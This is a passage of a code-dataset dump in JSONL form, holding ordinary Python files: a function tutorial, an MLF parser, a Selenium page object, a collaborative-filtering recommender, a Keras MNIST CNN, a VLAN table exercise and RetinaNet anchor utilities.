return(x**2)\nprint(square(9))\n\n\n# ## Positional Arguments\n# \n# ### Example\n\n# In[2]:\n\n\n\ndef square(*a):\n print(format(a))\nsquare(1,2)\nsquare(1,2,3)\nsquare(1,2,3,4)\n\n\n# ## Recursive Function\n# \n# * In Python, we know that a function can call other functions. \n# * It is even possible for the function to call itself. These types of construct are termed as recursive functions.\n# \n# ### Example\n\n# In[3]:\n\n\ndef factorial(x):\n if x == 1:\n return 1\n else:\n return (x * factorial(x-1))\n\n\nnum = 3\nprint(\"The factorial of\", num, \"is\", factorial(num))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"_build/jupyter_execute/usr.py","file_name":"usr.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"20811005","text":"#!/usr/bin/env python3\r\n# coding: utf-8\r\n\r\n\"\"\" Helper package for operations on MLF files.\r\nPiotr Zelasko @ AGH 2015\r\n\"\"\"\r\n\r\nimport re\r\n\r\nclass MlfAnnotation(object):\r\n def __init__(self, start_time=0, end_time=0, word='', comment=None):\r\n self.start_time = start_time\r\n self.end_time = end_time\r\n self.word = word\r\n self.comment = comment\r\n\r\n def __str__(self):\r\n return str(self.start_time) + \" \" + str(self.end_time) + \" \" + self.word + (\"# {0}\".format(self.comment) if self.comment else \"\")\r\n\r\n def __bool__(self):\r\n if self.start_time < self.end_time and self.word:\r\n return True\r\n return False\r\n __nonzero__ = __bool__ # python2 compatibility\r\n\r\n @staticmethod\r\n def from_string(line_str):\r\n # check for comment\r\n try:\r\n data, comment = line_str.split('#', 1) # strip comment\r\n comment = comment.strip()\r\n except ValueError:\r\n data = line_str\r\n comment = None\r\n pass\r\n\r\n try:\r\n data = data.split(' ') # split to 'start', 'end' and 'word'\r\n return MlfAnnotation(int(data[0]), int(data[1]), data[2], comment)\r\n except ValueError:\r\n return None\r\n\r\n @staticmethod\r\n def merge_annotations(annotations):\r\n new_start_time = annotations[0].start_time\r\n new_end_time = annotations[-1].end_time\r\n new_word = '_'.join([annot.word for annot in annotations])\r\n return MlfAnnotation(new_start_time, new_end_time, new_word)\r\n\r\n def repair(self):\r\n # ensure underscore correctness and remove all non-letter and non-digit annotations\r\n contains_any_alphanumeric = lambda x: re.search('[0-9a-zA-ZąęóżźćńśłĄĘÓŻŹŚŃŁĆ]', x) is not None\r\n self.word = \"_\".join(w for w in self.word.split(\"_\") if w and contains_any_alphanumeric(w))\r\n\r\n _conf_regex = re.compile(\"confidence:([\\-\\d\\.\\d]+)\")\r\n def confidence(self):\r\n try:\r\n match = self._conf_regex.match(self.comment)\r\n if match:\r\n return float(match.group(0))\r\n except ValueError:\r\n return None\r\n\r\n\r\nclass Mlf(object):\r\n def __init__(self, input_path=None):\r\n # initialize\r\n self.wavs = {}\r\n if not input_path:\r\n return # empty Mlf object\r\n\r\n # load mlf\r\n self.path = input_path\r\n lines = [line.strip() for line in open(input_path, mode='r', encoding='utf8')]\r\n\r\n # check header\r\n if \"MLF\" not in lines.pop(0): raise ValueError(\"Invalid MLF header!\")\r\n\r\n # parse file\r\n current_wav = \"\"\r\n for line in lines:\r\n\r\n # discard empty lines and comments\r\n if not line.strip() or line.startswith(\"#\"):\r\n continue\r\n\r\n # new wav indicator\r\n if line.startswith('\"'):\r\n # strip the double quotation characters and convert slashes to unix-style\r\n current_wav = line[1:-1].replace(\"\\\\\", \"/\")\r\n self.wavs[current_wav] = []\r\n continue\r\n\r\n # end of wav indicator\r\n if line.startswith(\".\"):\r\n current_wav = \"\"\r\n continue\r\n\r\n # no condition triggered so far - line must contain annotation\r\n self.wavs[current_wav].append(MlfAnnotation.from_string(line))\r\n\r\n def save(self, output_path=None):\r\n # if no path is supplied, overwrite original mlf\r\n if not output_path:\r\n output_path = self.path\r\n\r\n # perform save\r\n with open(output_path, 'w', encoding=\"utf8\") as output:\r\n\r\n # write header\r\n output.write(\"#!MLF!#\\n\")\r\n\r\n # write each wave file\r\n for wav_name in sorted(self.wavs):\r\n\r\n # if this wave has no annotations, skip it\r\n if not self.wavs[wav_name] or all(annot is None for annot in self.wavs[wav_name]): continue\r\n\r\n # if necessary, add double quotations to path to wave\r\n formatted_wav_name = wav_name\r\n if formatted_wav_name[0] != \"\\\"\": formatted_wav_name = \"\\\"\" + formatted_wav_name\r\n if formatted_wav_name[-1] != \"\\\"\": formatted_wav_name += \"\\\"\"\r\n\r\n # write path to wave\r\n output.write(formatted_wav_name + \"\\n\")\r\n\r\n # write each annotation\r\n for annot in self.wavs[wav_name]:\r\n if not annot: continue # skip empty annotations\r\n output.write(str(annot) + \"\\n\")\r\n\r\n # write end of wave file symbol\r\n output.write(\".\" + \"\\n\")\r\n\r\n def items(self):\r\n return self.wavs.items()\r\n\r\n def all_phrases(self):\r\n phr = set()\r\n for wav in self.wavs:\r\n for annot in self.wavs[wav]:\r\n phr.add(annot.word)\r\n return phr\r\n\r\n def __bool__(self):\r\n if len(self.wavs):\r\n return True\r\n return False\r\n\r\n __nonzero__ = __bool__ # python2 compatibility\r\n\r\n @staticmethod\r\n def MLF_TIME_TO_MS_FACTOR():\r\n return 10000.0\r\n\r\n\r\ndef ms_to_mlf_time(time_in_ms):\r\n return int(Mlf.MLF_TIME_TO_MS_FACTOR() * time_in_ms)\r\n\r\n\r\ndef mlf_time_to_ms(time_in_mlf):\r\n return time_in_mlf // Mlf.MLF_TIME_TO_MS_FACTOR()\r\n","sub_path":"s5/local/agh-conv/mlf.py","file_name":"mlf.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"421211148","text":"from os import walk\nimport json\nfrom matching_nlp import cosine_sim\nimport csv\nimport sys\n\nlower = int(sys.argv[1])\nupper = int(sys.argv[2])\n\n# filenames stored on disk\nstored_names = []\nmypath = './../Input/'\nfor (_, _, filenames) in walk(mypath):\n stored_names.extend(filenames)\n break\n\n# file names on mapping file\nvideo_map = {}\nwith open('video_map_'+str(lower)+'_'+str(upper), 'r') as myfile:\n for _, line in enumerate(myfile):\n line = line.split('\\n')[0]\n v_id = int(line.split(',')[0])\n v_name = line.split(',')[1]\n video_map[v_id] = v_name\n\n# start time and end time on json\nf = './../msr-vtt/2017/train_2017/videodatainfo_2017.json'\nwith open(f) as myfile:\n data = json.load(myfile)\nvideos = data.get('videos')\nmetadata = {}\nfor v in videos:\n v_id = int(v.get('id'))\n s_time = float(v.get('start time'))\n e_time = float(v.get('end time'))\n metadata[v_id] = [s_time, e_time]\n\n# list of missing videos\nmissing_id = []\nwith open('missing_video_'+str(lower)+'_'+str(upper), 'r') as myfile:\n for _, line in enumerate(myfile):\n missing_id.append(int(line.split('\\n')[0]))\n\n\nchecked = []\ncnt = 1\nfor v_id in range(lower, upper):\n if v_id in missing_id:\n continue\n temp_name = video_map.get(v_id)\n v_name = max(stored_names, key=lambda x: cosine_sim(x, temp_name))\n row = [v_id] + metadata.get(v_id) + [v_name]\n checked.append(row)\n if cnt % 10 == 0:\n print(cnt)\n else:\n print('.', end='', flush=True)\n cnt += 1\n\nprint(len(checked))\nwith open('checked_'+str(lower)+'_'+str(upper), 'a') as myfile:\n writer = csv.writer(myfile)\n writer.writerows(checked)\n","sub_path":"Scripts/check_2.py","file_name":"check_2.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375466157","text":"from selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom components.base_component import BaseComponent\n\n\nclass ChatDialogLocators:\n def __init__(self):\n self.root = '//div[@id=\"singleChat\"]'\n self.name = '//div[@class=\"dialogue-name dialogue-name_chat\"]'\n self.sendButton = '//div[@id=\"sendMessageBtn\"]'\n self.textArea = '//textarea[@id=\"sendMessage\"]'\n self.msgs = '//div[@class=\"single-message__body\"]'\n\n\nclass ChatDialog(BaseComponent):\n def __init__(self, driver):\n super(ChatDialog, self).__init__(driver)\n\n self.wait = WebDriverWait(self.driver, 20)\n self.locators = ChatDialogLocators()\n\n def get_chat_name(self) -> str:\n element = self.wait.until(\n EC.visibility_of_element_located((By.XPATH, self.locators.name)))\n return element.get_attribute('innerText')\n\n def click_send(self, text:str):\n elementText = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, self.locators.textArea)))\n elementText.send_keys(text)\n\n elementBtn = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, self.locators.sendButton)))\n elementBtn.click()\n\n def click_send_by_enter(self, text: str):\n elementText = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, self.locators.textArea)))\n elementText.send_keys(text)\n elementText.send_keys(u'\\ue007')\n\n def get_last_msg(self) -> str:\n elementStr = self.wait.until(\n EC.presence_of_all_elements_located((By.XPATH, self.locators.msgs)))\n\n return elementStr[len(elementStr) - 1].get_attribute('innerText')\n","sub_path":"components/chat_dialog.py","file_name":"chat_dialog.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"580613391","text":"from kozo import Role, KozoError, NODE_NAME\nfrom kozo.messages import Order\n\nclass PowerController_And(Role):\n\tdef localInit(self):\n\t\tif self['inChannel1'] == self['inChannel2']:\n\t\t\traise KozoError('Both input channels are equal: %s, %s' % (self['inChannel1'], self['inChannel2']))\n\t\tself._state1 = self['initialState1']\n\t\tself._state2 = self['initialState2']\n\tdef isInterestedIn(self, message):\n\t\treturn isinstance(message, Order) and message.getOrderType() == 'powercontrol' and message.getChannel() in (self['inChannel1'], self['inChannel2'])\n\tdef run(self):\n\t\tmessage = self.getMessage(timeout=self['timeout'])\n\t\tif message is not None:\n\t\t\tif message.getChannel() == self['inChannel1']:\n\t\t\t\tself._state1 = message.getOrderData()\n\t\t\telif message.getChannel() == self['inChannel2']:\n\t\t\t\tself._state2 = message.getOrderData()\n\t\tself.sendOrder('powercontrol', channel=self['outChannel'], data=self._state1 and self._state2)\n\nroleInfo = {\n\t'format': '1.0',\n\t'class': PowerController_And,\n\t'author': 'Etienne Perot',\n\t'version': '1.0',\n\t'description': 'AND gate for a PowerController.',\n\t'config': {\n\t\t'outChannel': {\n\t\t\t'description': 'Name of the output powercontrol order channel.'\n\t\t},\n\t\t'inChannel1': {\n\t\t\t'description': 'Name of the first powercontrol order channel to subscribe to.'\n\t\t},\n\t\t'inChannel2': {\n\t\t\t'description': 'Name of the second powercontrol order channel to subscribe to.'\n\t\t},\n\t\t'initialState1': {\n\t\t\t'default': False,\n\t\t\t'description': 'Initial value of the first powercontrol order channel prior to receiving any message.'\n\t\t},\n\t\t'initialState2': {\n\t\t\t'default': False,\n\t\t\t'description': 'Initial value of the first powercontrol order channel prior to receiving any message.'\n\t\t},\n\t\t'timeout': {\n\t\t\t'default': 5,\n\t\t\t'description': 'If we do not receive any message in this amount of time, send out an order anyway with the last information.'\n\t\t},\n\t}\n}\n","sub_path":"kozo/roles/powercontroller_and.py","file_name":"powercontroller_and.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372402775","text":"from operator import itemgetter\n\nimport math\n\nfrom abs.AbsRecommender import AbsRecommender\nfrom aop.LogAop import log\nfrom commen import SplitData, Evaluation\nfrom util import FileUtil\nimport logging\n\n\nclass UserCF(AbsRecommender):\n __rawData = []\n __dataSet = {}\n __trainSet = {}\n __testSet = {}\n __W = {}\n __recResult = {}\n __itemId2UserIds = {}\n\n def __init__(self):\n pass\n\n @log()\n def __initMatrix(self, indexes, initialValue):\n # 初始化矩阵\n w = {}\n for index1 in indexes:\n w[index1] = {}\n for index2 in indexes:\n w[index1][index2] = initialValue\n return w\n\n @log()\n def loadRawData(self, path) -> []:\n # logging.info(\"开始加载原始数据,path = %s\", path)\n # self.__timer.start()\n self.__rawData = FileUtil.readAllLines(path)\n self.__rawData.pop(0) # 删除第一行的title\n # logging.debug(\"原始数据长度:%d,原始数据:%s\", len(self.__rawData), str(self.__rawData))\n # logging.info('加载数据完成,用时:%dms', self.__timer.stop())\n return self.__rawData\n\n @log()\n def generateDataset(self) -> ({str: [()]}, {str: [()]}):\n # logging.info(\"生成dataSet,trainSet,testSet,不考虑评分和时间戳\")\n # self.__timer.start()\n for line in self.__rawData:\n split = line.split(',')\n userId = split[0]\n itemId = split[1]\n self.__dataSet.setdefault(userId, set())\n self.__dataSet[userId].add(itemId)\n # logging.debug(\"dataSet:长度:%d,数据:%s\", len(self.__dataSet), str(self.__dataSet))\n # logging.info(\"dataSet:长度:%d\", len(self.__dataSet))\n # 将每个userId对应的items分割,80%作训练集,20%作测试集\n for userId, itemIds in self.__dataSet.items():\n testSetItems, trainSetItems = SplitData.randomSplitList(list(itemIds), 0.2)\n self.__trainSet[userId] = set(trainSetItems)\n self.__testSet[userId] = set(testSetItems)\n # logging.info(\"trainSet:长度:%d\", len(self.__trainSet))\n # logging.debug(\"trainSet:长度:%d,数据:%s\", len(self.__trainSet), str(self.__trainSet))\n # logging.debug(\"testSet:长度:%d,数据:%s\", len(self.__testSet), str(self.__testSet))\n # logging.info(\"testSet:长度:%d\", len(self.__testSet))\n # logging.info('生成数据集完成,用时:%dms', self.__timer.stop())\n\n @log()\n def calcSimMatrix(self) -> {}:\n \"\"\"\n 计算user相似度矩阵w\n w[u][v]:用户u和v的相似度\n N(u):用户u的物品列表\n N(v):用户v的物品列表\n C[u][v]用户u和v共有的物品数 即 c[u][v] = len(N(u) & N(v))\n 公式:w[u][v] = c[u][v]/sqrt(len(N(u))*len(N(v)))\n \"\"\"\n # logging.info(\"生成用户相似度矩阵\")\n # self.__timer.start()\n # 1.建立item-user倒排表\n itemId2UserIds = {}\n for userId, itemIds in self.__trainSet.items():\n for itemId in itemIds:\n itemId2UserIds.setdefault(itemId, set())\n itemId2UserIds[itemId].add(userId)\n # logging.debug('item-user倒排表:%s', str(itemId2UserIds))\n self.__itemId2UserIds = itemId2UserIds\n # 2.计算C[u][v]\n C = self.__initMatrix(self.__trainSet.keys(), 0)\n for itemId, userIds in itemId2UserIds.items():\n for u in userIds:\n for v in userIds:\n C[u][v] += 1\n # logging.debug('C[u][v]:%s', str(C))\n # 3.计算W[u][v]\n self.__W = self.__initMatrix(self.__trainSet.keys(), 0)\n for u in self.__trainSet.keys():\n for v in self.__trainSet.keys():\n self.__W[u][v] = C[u][v] / math.sqrt(len(self.__trainSet[u]) * len(self.__trainSet[v]))\n # logging.debug('W[u][v]:%s:', str(self.__W))\n # logging.info('生成用户相似度矩阵完成,用时:%dms', self.__timer.stop())\n return self.__W\n\n @log()\n def recommendForAllUser(self, K):\n \"\"\"\n 生成训练集上所有用户的推荐列表,计算每个用户和他相邻的K个用户的物品列表中的每个物品的兴趣程度pui\n 公式:p(u,i) = 求和W[u][v]*R[v][i],对所有的v属于S(u,K) & N(i),这里用隐反馈,R[v][i]=1\n :param K: 最相近的K个用户\n :return: 每个用户的推荐结果\n \"\"\"\n # logging.info(\"为所有用户生成推荐\")\n # self.__timer.start()\n for u in self.__trainSet.keys():\n self.__recResult[u] = {}\n for v, wuv in sorted(self.__W[u].items(), key=itemgetter(1), reverse=True)[0:K]:\n for itemId in self.__trainSet[v]:\n if itemId not in self.__trainSet[u]:\n self.__recResult[u].setdefault(itemId, 0.0)\n self.__recResult[u][itemId] += self.__W[u][v]\n\n # logging.info('为所有用户生成推荐完成,用时:%dms', self.__timer.stop())\n # logging.info('用户1的推荐列表%s', sorted(self.__recResult['1'].items(), key=itemgetter(1), reverse=True))\n return self.__recResult\n\n @log()\n def evaluate(self):\n \"\"\"\n 评估推荐效果,ru:为u推荐的itemList,tu:测试集上u的itemList\n \"\"\"\n # logging.info(\"开始评估指标\")\n # self.__timer.start()\n data = []\n allRu = set()\n ruList = []\n for userId, recItems in self.__recResult.items():\n tu = self.__testSet[userId]\n ru = {itemId for itemId, pui in sorted(recItems.items(), key=itemgetter(1), reverse=True)[0:10]}\n ruList.append(ru)\n allRu.update(ru)\n data.append((tu, ru))\n recall = Evaluation.recall(data)\n precision = Evaluation.precision(data)\n\n trainItems = set(self.__itemId2UserIds.keys())\n coverage = Evaluation.coverage(allRu, trainItems)\n\n popularity = Evaluation.popularity(self.__trainSet, ruList)\n\n # logging.info('评估指标完成,用时:%dms', self.__timer.stop())\n # logging.info('召回率:%.2f%%', recall * 100)\n # logging.info('准确率:%.2f%%', precision * 100)\n # logging.info('覆盖率:%.2f%%', coverage * 100)\n # logging.info('流行度:%.2f', popularity)\n return recall, precision,coverage,popularity\n","sub_path":"chapter2/UserCF.py","file_name":"UserCF.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"2331479","text":"import tensorflow as tf\nfrom tensorflow.keras import layers, models\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.python.keras.layers.core import Flatten\nfrom tensorflow.python.keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import SGD\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.model_selection import KFold\nfrom matplotlib import pyplot as plt, use\nfrom numpy import mean, std\nfrom tensorflow.keras import initializers\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(gpus[0], True)\n\nclass Network2:\n\n def __init__(self):\n (self.train_X, self.train_y), (self.test_X, self.test_y) = mnist.load_data() \n self.image_input_layer = layers.InputLayer(input_shape=(28, 28, 1))\n self.convolution2d_layer1 = layers.Conv2D(20, use_bias=True, strides=(1,1), activation='relu', padding='same', kernel_size=(3, 3), kernel_initializer=initializers.RandomNormal(stddev=0.01, mean=0, seed=None))\n self.max_pooling2d_layer1 = layers.MaxPooling2D(strides=(2,2), pool_size=(2, 2), padding='valid')\n self.convolution2d_layer2 = layers.Conv2D(30, use_bias=True, strides=(1,1), kernel_size=(3,3), padding='same', activation='relu', kernel_initializer=initializers.RandomNormal(stddev=0.01, mean=0, seed=None))\n self.max_pooling2d_layer2 = layers.MaxPooling2D(strides=(2,2), pool_size=(2,2), padding='valid')\n self.convolution2d_layer3 = layers.Conv2D(50, use_bias=True, strides=(1,1), padding='same', kernel_size=(3,3), activation='relu', kernel_initializer=initializers.RandomNormal(stddev=0.01, mean=0, seed=None))\n self.fully_connected_layer = layers.Dense(10, activation='softmax')\n self.optimizer = SGD(momentum = 0.9, lr=0.01)\n self.history_list = list()\n self.score_list = list()\n\n def define_network(self):\n network2 = models.Sequential()\n network2.add(self.image_input_layer)\n network2.add(self.convolution2d_layer1)\n #network2.add(BatchNormalization())\n network2.add(self.max_pooling2d_layer1)\n network2.add(self.convolution2d_layer2)\n #network2.add(BatchNormalization())\n network2.add(self.max_pooling2d_layer2)\n network2.add(self.convolution2d_layer3)\n #network2.add(BatchNormalization())\n network2.add(Flatten())\n network2.add(self.fully_connected_layer)\n network2.compile(metrics=['accuracy'], loss='categorical_crossentropy', optimizer=self.optimizer)\n return network2\n \n def summary(self):\n print(self.network2.summary())\n\n def load_mnist(self):\n training_shape = (self.train_X.shape[0], 28, 28, 1) # Single channel shape\n testing_shape = (self.test_X.shape[0], 28, 28, 1)\n self.train_X = self.train_X.reshape(training_shape)\n self.test_X = self.test_X.reshape(testing_shape)\n self.train_y = to_categorical(self.train_y)\n self.test_y = to_categorical(self.test_y)\n\n def eval(self):\n\n cross_validator = KFold(10, random_state=1, shuffle=True)\n \n for i, j in cross_validator.split(self.train_X):\n net = self.define_network()\n train_X = self.train_X[i]\n train_y = self.train_y[i]\n test_X = self.train_X[j]\n test_y = self.train_y[j]\n history = net.fit(train_X, train_y, validation_data = (test_X, test_y), epochs = 30, batch_size = 4096, verbose = 1)\n _, accuracy = net.evaluate(test_X, test_y, verbose=0)\n print(\"\\nAccuracy = \" + str(100 * accuracy))\n self.score_list.append(accuracy)\n self.history_list.append(history)\n\n def information(self):\n for i in range(len(self.history_list)):\n\n plt.subplot(2, 1, 1)\n plt.title('Loss')\n plt.xlabel('Epochs')\n plt.plot(self.history_list[i].history['loss'], color='orange', label='Training data')\n plt.plot(self.history_list[i].history['val_loss'], color='blue', label ='Testing data')\n \n plt.subplot(2, 1, 2)\n plt.title('Accuracy')\n plt.xlabel('Epochs')\n plt.plot(self.history_list[i].history['accuracy'], color='orange', label='Training data')\n plt.plot(self.history_list[i].history['val_accuracy'], color='blue', label ='Testing data')\n\n plt.legend()\n \n plt.show()\n\n print('Mean accuracy: ' + str(100 * mean(self.score_list)))\n print(\"Std accuracy: \" + str(std(self.score_list)))\n print(\"n = \" + str(len(self.score_list)))\n\n def pixel_scaling(self):\n\n train = self.train_X.astype('float32')\n test = self.test_X.astype('float32')\n\n self.train_X = train / 255.0\n self.test_X = test / 255.0\n\n\ndef main():\n net = Network2()\n net.load_mnist()\n net.pixel_scaling()\n net.eval()\n net.information()\n\nmain()","sub_path":"ANNHW3/ConvolutionalNetwork2.py","file_name":"ConvolutionalNetwork2.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"646946817","text":"#!/usr/bin/env python3\n\"\"\"\nСкрипт должен обрабатывать записи в файле CAM_table.txt таким образом чтобы:\n\n считывались только строки, в которых указаны MAC-адреса\n каждая строка, где есть MAC-адрес, должна обрабатываться таким образом, чтобы на стандартный поток вывода была выведена таблица вида:\n\n 100 01bb.c580.7000 Gi0/1\n 200 0a4b.c380.7010 Gi0/2\n 300 a2ab.c5a0.2000 Gi0/3\n 100 0a1b.1c80.7300 Gi0/4\n 500 02b1.3c80.7000 Gi0/5\n 200 1a4b.c580.5000 Gi0/6\n 300 0a1b.5c80.9010 Gi0/7\n----\nДополнить скрипт:\n Отсортировать вывод по номеру VLAN\n----\nДополнить скрипт:\n Запросить у пользователя ввод номера VLAN.\n Выводить информацию только по указанному VLAN.\n\n\"\"\"\n#\nsymb='Gi'\ntable=[]\nvlan_num_list=[]\n\nwith open ('CAM_table.txt', 'r') as cam_table:\n for line in cam_table:\n if symb in line:\n table.append(line.strip().split())\n\ntable.sort()\n\nfor i in range(len(table)):\n vlan_num_list.append(table[i][0])\n\nvlan_num_list = set(vlan_num_list)\nvlan_num_list = list(vlan_num_list)\nvlan_num_list.sort()\n\nprint('Введите номер VLAN из списка', str(vlan_num_list), ':', end='')\nvlan = input()\n\nfor i in range(len(table)):\n if table[i][0] == vlan:\n print(' '.join(table[i]).strip())\n","sub_path":"exercise_7.3/exercise_7.3b.py","file_name":"exercise_7.3b.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"605954233","text":"#!/usr/bin/python3\nimport curses \n\nstdscr = curses.initscr()\npad = curses.newpad(23, 120)\norder_pad = curses.newpad(10, 120)\ntimestamp = \"\"\nlast_order_update = 0\ncurses.start_color()\ncurses.noecho()\ncurses.cbreak()\ncurses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_GREEN)\ncurses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_RED)\nstdscr.keypad(1)\npad.addstr(1, 0, \"Waiting for a trade...\")\npad.refresh(0,0,0,0, 20, 20)\nstdscr.getkey()\n","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196249680","text":"def solve(instructions):\n wires = {}\n reset = False\n \n while True:\n for instruction in instructions:\n command = instruction.split()\n target = command[-1]\n if len(command) == 3:\n if not command[0][-1].isdigit() and not command[0] in wires:\n continue\n val = int(command[0]) if command[0][-1].isdigit() else wires[command[0]]\n if not reset or not command[2] == 'b':\n wires[command[2]] = val\n elif command[0] == 'NOT':\n if not command[1] in wires:\n continue\n wires[target] = (~wires[command[1]] & 0xffff)\n elif command[1] == 'LSHIFT':\n if not command[0] in wires:\n continue\n if not target in wires:\n wires[target] = 0\n val = int(command[2])\n wires[target] = wires[command[0]] << val\n elif command[1] == 'RSHIFT':\n if not command[0] in wires:\n continue\n if not target in wires:\n wires[target] = 0\n val = int(command[2])\n wires[target] = wires[command[0]] >> val\n else:\n if (not command[0][-1].isdigit() and not command[0] in wires) or (not command[2][-1].isdigit() and not command[2] in wires):\n unset = True\n continue\n\n a = int(command[0]) if command[0][-1].isdigit() else wires[command[0]]\n b = int(command[2]) if command[2][-1].isdigit() else wires[command[2]]\n\n if command[1] == 'AND':\n wires[target] = a & b\n elif command[1] == 'OR':\n wires[target] = a | b\n\n if 'a' in wires:\n if reset:\n return wires['a']\n reset = True\n aval = wires['a']\n wires = {'b': aval}\n \nwith open('input_7.txt', 'r') as f:\n print(solve(f.readlines()))","sub_path":"7b.py","file_name":"7b.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623690115","text":"\"\"\"\nCopyright 2017-2018 Fizyr (https://fizyr.com)\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport numpy as np\n\n\ndef anchor_targets(image, gt_boxes, num_classes, negative_overlap=0.4, positive_overlap=0.5, **kwargs):\n # first create the anchors for this image\n anchors = anchors_for_image(image, **kwargs)\n\n # label: 1 is positive, 0 is negative, -1 is dont care\n labels = np.ones((anchors.shape[0], num_classes)) * -1\n\n # obtain indices of gt boxes with the greatest overlap\n overlaps = compute_overlap(anchors, gt_boxes[:, :4])\n argmax_overlaps_inds = np.argmax(overlaps, axis=1)\n max_overlaps = overlaps[np.arange(overlaps.shape[0]), argmax_overlaps_inds]\n\n # assign bg labels first so that positive labels can clobber them\n labels[max_overlaps < negative_overlap, :] = 0\n\n # compute box regression targets\n gt_boxes = gt_boxes[argmax_overlaps_inds]\n bbox_reg_targets = bbox_transform(anchors, gt_boxes)\n\n # fg label: above threshold IOU\n positive_indices = max_overlaps >= positive_overlap\n labels[positive_indices, :] = 0\n labels[positive_indices, gt_boxes[positive_indices, 4].astype(int)] = 1\n\n return labels, bbox_reg_targets\n\n\ndef anchors_for_image(image, pyramid_levels=None, anchor_ratios=None, anchor_scales=None, anchor_strides=None, anchor_sizes=None):\n if pyramid_levels is None:\n pyramid_levels = [3, 4, 5, 6, 7]\n if anchor_strides is None:\n anchor_strides = [2 ** x for x in pyramid_levels]\n if anchor_sizes is None:\n anchor_sizes = [2 ** (x + 2) for x in pyramid_levels]\n\n shape = np.array(image.shape[:2])\n for i in range(pyramid_levels[0] - 1):\n shape = (shape + 1) // 2 # skip the first two levels\n\n all_anchors = np.zeros((0, 4))\n for idx, p in enumerate(pyramid_levels):\n shape = (shape + 1) // 2\n anchors = generate_anchors(base_size=anchor_sizes[idx], ratios=anchor_ratios, scales=anchor_scales)\n shifted_anchors = shift(shape, anchor_strides[idx], anchors)\n all_anchors = np.append(all_anchors, shifted_anchors, axis=0)\n\n return all_anchors\n\n\ndef shift(shape, stride, anchors):\n shift_x = (np.arange(0, shape[1]) + 0.5) * stride\n shift_y = (np.arange(0, shape[0]) + 0.5) * stride\n\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n\n shifts = np.vstack((\n shift_x.ravel(), shift_y.ravel(),\n shift_x.ravel(), shift_y.ravel()\n )).transpose()\n\n # add A anchors (1, A, 4) to\n # cell K shifts (K, 1, 4) to get\n # shift anchors (K, A, 4)\n # reshape to (K*A, 4) shifted anchors\n A = anchors.shape[0]\n K = shifts.shape[0]\n all_anchors = (anchors.reshape((1, A, 4)) + shifts.reshape((1, K, 4)).transpose((1, 0, 2)))\n all_anchors = all_anchors.reshape((K * A, 4))\n\n return all_anchors\n\n\ndef generate_anchors(base_size=16, ratios=None, scales=None):\n \"\"\"\n Generate anchor (reference) windows by enumerating aspect ratios X\n scales w.r.t. a reference window.\n \"\"\"\n\n if ratios is None:\n ratios = np.array([0.5, 1, 2])\n\n if scales is None:\n scales = np.array([2 ** 0, 2 ** (1.0 / 3.0), 2 ** (2.0 / 3.0)])\n\n num_anchors = len(ratios) * len(scales)\n\n # initialize output anchors\n anchors = np.zeros((num_anchors, 4))\n\n # scale base_size\n anchors[:, 2:] = base_size * np.tile(scales, (2, len(ratios))).T\n\n # compute areas of anchors\n areas = anchors[:, 2] * anchors[:, 3]\n\n # correct for ratios\n anchors[:, 2] = np.sqrt(areas / np.repeat(ratios, len(scales)))\n anchors[:, 3] = anchors[:, 2] * np.repeat(ratios, len(scales))\n\n # transform from (x_ctr, y_ctr, w, h) -> (x1, y1, x2, y2)\n anchors[:, 0::2] -= np.tile(anchors[:, 2] * 0.5, (2, 1)).T\n anchors[:, 1::2] -= np.tile(anchors[:, 3] * 0.5, (2, 1)).T\n\n return anchors\n\n\ndef bbox_transform(anchors, gt_boxes):\n \"\"\"Compute bounding-box regression targets for an image.\"\"\"\n anchor_widths = anchors[:, 2] - anchors[:, 0] + 1.0\n anchor_heights = anchors[:, 3] - anchors[:, 1] + 1.0\n anchor_ctr_x = anchors[:, 0] + 0.5 * anchor_widths\n anchor_ctr_y = anchors[:, 1] + 0.5 * anchor_heights\n\n gt_widths = gt_boxes[:, 2] - gt_boxes[:, 0] + 1.0\n gt_heights = 